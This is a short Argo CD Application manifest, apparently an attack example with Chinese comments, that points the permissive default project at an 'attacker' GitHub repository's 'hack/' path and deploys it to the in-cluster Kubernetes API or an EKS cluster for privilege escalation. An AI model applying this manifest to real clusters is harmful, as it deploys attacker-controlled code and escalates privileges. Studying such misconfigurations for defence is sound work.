apiVersion: argoproj.io/v1alpha1
kind: Application
metadata:
  name: privesc-app
  namespace: argocd
spec:
  project: default  # 默认项目允许任意目标
  source:
    repoURL: https://github.com/attacker/privesc-repo
    targetRevision: HEAD
    path: hack/
  destination:
    server: https://kubernetes.default.svc  # 或指定 EKS 集群
    namespace: default
